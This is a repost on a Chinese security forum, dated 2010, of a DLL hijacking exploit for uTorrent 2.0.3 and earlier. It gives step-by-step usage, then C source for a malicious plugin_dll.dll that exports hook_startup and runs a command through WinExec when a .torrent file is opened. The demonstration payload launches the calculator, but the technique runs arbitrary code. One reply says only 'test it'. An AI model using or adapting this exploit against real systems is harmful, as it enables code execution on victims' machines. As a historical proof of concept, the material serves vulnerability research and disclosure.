首页
社区
课程
招聘
[转帖]uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
发表于: 2010-8-25 11:06 5403

[转帖]uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)

2010-8-25 11:06
5403
/*
Exploit Title: uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
Date: 24/08/2010
Author: TheLeader
Software Link: 53dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4g2@1L8%4u0J5k6h3&6@1i4K6u0W2j5$3!0E0i4K6u0r3k6r3!0%4L8X3I4G2j5h3c8K6
Version: 2.0.3 and prior
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to plugin_dll.dll, create a file in the same dir with one of the following extensions:
.torrent / .btsearch

Double click & watch a nice calculator pop =]

A nice post about DLL Hijacking by Yam Mesicka (hebrew):
50bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2W2M7$3W2U0K9$3q4Q4x3X3g2U0L8$3#2Q4x3V1k6V1L8r3I4Q4x3X3c8Z5K9h3A6S2j5$3E0A6L8X3N6Q4x3X3c8%4K9h3&6V1L8%4N6K6i4K6u0V1K9r3c8Q4x3X3c8E0L8$3!0J5k6g2)9J5c8R3`.`.

@avivra: glad to provide entertainment for you guys =D

*Even more shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 559
活跃值: (349)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
测试下!!
2010-10-18 10:43
0
游客
登录 | 注册 方可回帖
返回